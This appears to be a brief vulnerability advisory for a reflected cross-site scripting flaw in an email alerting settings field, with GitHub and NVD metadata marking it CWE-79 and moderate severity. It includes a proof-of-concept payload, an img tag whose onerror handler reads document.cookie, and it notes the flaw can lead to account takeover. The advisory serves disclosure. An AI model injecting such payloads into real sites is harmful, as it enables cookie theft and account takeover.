reflected xss via email field
http://127.0.0.1/settings/alerting/email<img src=1 onerror=alert(document.cookie)>
can lead to ATO
{
"nvd_published_at": "2026-02-20T02:16:54Z",
"github_reviewed_at": "2026-02-18T22:07:06Z",
"severity": "MODERATE",
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true
}